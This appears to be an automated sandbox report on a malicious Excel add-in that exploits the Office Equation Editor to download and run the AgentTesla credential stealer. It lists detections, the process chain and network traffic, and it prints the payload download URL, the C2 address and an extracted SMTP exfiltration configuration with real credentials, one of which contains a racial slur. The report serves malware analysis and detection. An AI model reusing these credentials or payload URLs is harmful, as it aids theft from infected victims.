Windows Analysis Report
TR-AHYO-12-13-2024.xlam.xlsx

Overview

General Information

Sample name: TR-AHYO-12-13-2024.xlam.xlsx
Analysis ID: 1574864
MD5: a278c0370e95b81fed05f5f16cd482c0
SHA1: af710a7cba9e1770a71b70889d8930d516241586
SHA256: f5eeb56fa4c609e146563f5f7a9798f34845455f039245b95fa9e436e453ed96
Tags: xlam, xlsx, user-abuse_ch

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3196 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 3412 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • fryvcftyii.exe (PID: 3552 cmdline: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe MD5: EF05B0557B2C8F0C951A1B21B812E75F)
        • RegSvcs.exe (PID: 3560 cmdline: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.worlorderbillions.top", "Username": "niggabown22jan2024@worlorderbillions.top", "Password": "3^?r?mtxk(kt               "}
Source: sheet1.xml | Rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document | Description: detects AutoLoad documents using LegacyDrawing | Author: ditekSHen | Strings:
  • 0x679c:$s1: <legacyDrawing r:id="
  • 0x67c4:$s2: <oleObject progId="
  • 0x6805:$s3: autoLoad="true"
Source: 00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmp | Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Description: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen | Strings:
  • 0x334fb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x3356d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x335f7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x33689:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x336f3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x33765:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x337fb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3388b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 00000006.00000002.620624233.0000000000402000.00000040.80000000.00040000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 00000006.00000002.620624233.0000000000402000.00000040.80000000.00040000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security

Source: 6.2.RegSvcs.exe.400000.0.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 6.2.RegSvcs.exe.400000.0.unpack | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 6.2.RegSvcs.exe.400000.0.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Description: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen | Strings:
  • 0x334fb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x3356d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x335f7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x33689:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x336f3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x33765:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x337fb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3388b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security

Exploits

Source: Network Connection | Author: Joe Security | Data: DestinationIp: 190.90.160.170, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3412, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3412, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exe

System Summary

Source: Network Connection | Author: Max Altgelt (Nextron Systems) | Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3412, Protocol: tcp, SourceIp: 190.90.160.170, SourceIsIpv6: false, SourcePort: 80
Source: Process started | Author: Jason Lynch | Data: Command: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, CommandLine: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3412, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, ProcessId: 3552, ProcessName: fryvcftyii.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, CommandLine: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3412, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, ProcessId: 3552, ProcessName: fryvcftyii.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, CommandLine: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, ParentImage: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, ParentProcessId: 3552, ParentProcessName: fryvcftyii.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe, ProcessId: 3560, ProcessName: RegSvcs.exe
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3412, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  No Suricata rule has matched

AV Detection

Source: TR-AHYO-12-13-2024.xlam.xlsx | Avira: detected
Source: http://aquafusion.com.co/ngbx/ngown.exe | Avira URL Cloud: Label: malware
Source: 5.2.fryvcftyii.exe.180000.0.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.worlorderbillions.top", "Username": "niggabown22jan2024@worlorderbillions.top", "Password": "3^?r?mtxk(kt "}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exe | ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | ReversingLabs: Detection: 73%
Source: TR-AHYO-12-13-2024.xlam.xlsx | ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Joe Sandbox ML: detected

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 190.90.160.170 Port: 80
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: fryvcftyii.exe, 00000005.00000003.476364985.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, fryvcftyii.exe, 00000005.00000003.476210575.0000000002A60000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_0042445A GetFileAttributesW,FindFirstFileW,FindClose,5_2_0042445A
Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_0042C6D1 FindFirstFileW,FindClose,5_2_0042C6D1
Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_0042C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_0042C75C
Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_0042EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_0042EF95
Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_0042F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_0042F0F2
Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_0042F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_0042F3F3
Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_004237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_004237EF
Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_00423B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00423B12
Source: C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Code function: 5_2_0042BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_0042BCBC

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036A057D URLDownloadToFileW,2_2_036A057D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036A05C8 WinExec,ExitProcess,2_2_036A05C8
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036A0502 LoadLibraryW,URLDownloadToFileW,2_2_036A0502
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036A05E8 ExitProcess,2_2_036A05E8
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036A046C URLDownloadToFileW,2_2_036A046C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036A0488 URLDownloadToFileW,2_2_036A0488
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036A051C URLDownloadToFileW,2_2_036A051C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036A0453 ExitProcess,2_2_036A0453
Source: global traffic | DNS query: name: aquafusion.com.co
Source: global traffic | TCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
Source: global traffic | TCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 190.90.160.170:80
                  Source: global trafficTCP traffic: 190.90.160.170:80 -> 192.168.2.22:49161
